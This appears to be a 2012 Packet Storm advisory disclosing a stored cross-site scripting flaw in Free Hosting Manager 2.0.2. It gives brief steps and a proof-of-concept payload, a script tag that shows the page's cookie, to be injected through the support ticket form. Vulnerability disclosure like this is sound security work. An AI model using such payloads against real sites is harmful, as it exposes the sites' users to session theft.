Free Hosting Manager 2.0.2 Cross Site Scripting

2012-12-19T00:00:00
ID PACKETSTORM:118934
Type packetstorm
Reporter Lee Chung Eon
Modified 2012-12-19T00:00:00

Description

                                        
                                            `# Exploit Title: Free hosting manager V2.0.2 Stored XSS  
# Date: 19/12/2012  
# Exploit Author: Lee Chung Eon  
# Vendor by:  
# Software Link: http://www.fhm-script.com/download.php  
# Version: 2.0.2  
# Category:Web Security  
# Tested on: Windows xp / 7  
+--------------------------------------------------------------------------+  
  
Stored XSS-vulnerabilities  
  
  
0. install  
  
1. register complete  
  
2. inject following code  
  
<script>alert(document.cookie)</script>  
  
3. into support --> ticket  
  
4. Visit your profile and Can see the execution of injected script  
  
------------------------------------------------------------------------------  
  
`